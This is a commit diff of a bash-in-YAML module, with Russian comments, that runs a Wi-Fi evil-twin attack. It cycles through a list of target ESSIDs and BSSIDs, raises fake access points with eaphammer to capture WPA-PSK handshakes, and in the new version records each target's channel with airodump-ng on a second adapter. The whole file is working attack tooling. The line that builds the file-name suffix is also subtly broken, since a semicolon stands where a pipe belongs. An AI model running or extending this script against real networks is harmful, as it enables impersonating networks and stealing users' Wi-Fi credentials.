updade module

diff --git a/modules/wifi/wpa-psk/etwin-pulsar.yaml b/modules/wifi/wpa-psk/etwin-pulsar.yaml
--- a/modules/wifi/wpa-psk/etwin-pulsar.yaml
+++ b/modules/wifi/wpa-psk/etwin-pulsar.yaml
@@ -1,5 +1,5 @@
 description: |- 
-  Поднимает поддельные точки доступа по таймауту
+  Поднимает поддельные точки доступа по таймауту на одном адаптере и перехватывает трафик на втором - так получается получить наиболее валидные результаты.
 
   ВНИМАНИЕ! Любое внешнее логирование судя по всему ломает eaphammer - и встроенные функции bshm, и tee... Мистика!
 tags:
@@ -8,46 +8,83 @@ tags:
   - handshake
 
 arguments:
-  interface:
-    description: имя интерфейса wlan
+  ap-wlan:
+    description: имя интерфейса wlan для AP
+    replacer: '#ap-wlan#'
+  mon-wlan:
+    description: имя интерфейса wlan для мониторинга
+    replacer: '#mon-wlan#' 
   list:
     description: 'файлы со списками параметров точек доступа в формате "ESSID;BSSID;CHANNEL" (например: "FakeAP;2f:db:4c:70:74:74;8")'
     multiple: true
     replacer: '#list#'
   t:
     description: время в секундах для переключения между точками
-    default: 30
+    default: 15
     replacer: '#timeout#'
     metavar: SECONDS
     regex: '[0-9]+'
   d:
     description: директория, куда скрипт будет складывать .cap файлы (их будет много!)
-    default: 'etwin-pulsar'
+    default: 'pulsar'
     replacer: '#dir#'
     metavar: DIRECTORY
 
 mode:
   format:
-    interface: '{!r}'
+    ap-wlan: '{!r}'
+    mon-wlan: '{!r}'
     list: '{!r}'
     t: '{}s'
 
 shell: bash
 
-script: >-
-  interface=#interface#;
+script: |-
+  interface=#ap-wlan#;
+  monitor=#mon-wlan#;
   outdir=#dir#;
+  
+  # Проверки
+  iw dev $interface info 2>&1 1>/dev/null || { echo "Device $interface not found"; exit ; };
+  iw dev $monitor info 2>&1 1>/dev/null || { echo "Device $monitor not found"; exit ; };
+  
+  # Функции
+  stop_mon_screen() { sudo screen -S pulsar-monitor-proc -X stuff '^C'; };
+  exit_func() { stop_mon_screen; exit; };
+
   mkdir -p $outdir;
   while true; do
-  for ap in $(cat #list# | sort -u | sort -R); do
-  sudo ip link set $interface down;
-  sudo iw $interface set type managed;
-  sudo ip link set $interface up;
-  sudo nmcli dev set $interface managed yes;
-  sudo timeout -s INT -k 15s #timeout# eaphammer --interface $interface --essid $(echo $ap | awk -F ';' '{print $1}') --auth wpa-psk --password 00000000 --creds --psk-capture-file "$(realpath $outdir/etwin-pulsar-$(date +%Y%m%d%H%M%S).cap)" --bssid $(echo $ap | awk -F ';' '{print $2}') --channel $(echo $ap | awk -F ';' '{print $3}');
-  trap exit SIGINT;
-  echo; echo "Press CTRL+C to exit";
-  for i in 5 4 3 2 1; do echo -n "$i... "; sleep 1; done; echo;
-  done;
+    for ap in $(cat #list# | sort -u | sort -R); do
+      # Параметры
+      essid=$(echo $ap | awk -F ';' '{print $1}');
+      bssid=$(echo $ap | awk -F ';' '{print $2}');
+      channel=$(echo $ap | awk -F ';' '{print $3}');
+      suffix=$(echo $bssid; sed "s:[^[:alnum:]_./а-яА-Я]\+:_:g");
+      aphsfile=$(realpath $outdir/apdump-$suffix-$(date +%Y%m%d%H%M%S).cap);
+      monhsfile=$(realpath $outdir/mondump-$suffix-$(date +%Y%m%d%H%M%S));
+
+      # Мониторинг
+      screen -XS pulsar-monitor-proc quit >/dev/null;
+      sudo nmcli dev set $monitor managed no;
+      sudo ip link set $monitor down;
+      sudo iw $monitor set monitor control;
+      sudo ip link set $monitor up;
+      sudo screen -dmS pulsar-monitor-proc airodump-ng $monitor -c $channel --bssid $bssid --write $monhsfile --output-format pcap;
+
+      # Точка доступа
+      sudo ip link set $interface down;
+      sudo iw $interface set type managed;
+      sudo ip link set $interface up;
+      sudo nmcli dev set $interface managed yes;
+      sudo timeout -s INT -k 20s #timeout# eaphammer --interface $interface --essid $essid --auth wpa-psk --password 00000000 --creds --psk-capture-file $aphsfile --bssid $bssid --channel $channel;
+      
+      # Выход
+      stop_mon_screen;
+      trap exit_func SIGINT;
+      echo; echo "Press CTRL+C to exit";
+      for i in 5 4 3 2 1; do echo -n "$i... "; sleep 1; done; 
+      screen -XS pulsar-monitor-proc quit >/dev/null;
+      echo; 
+    done;
   done
   
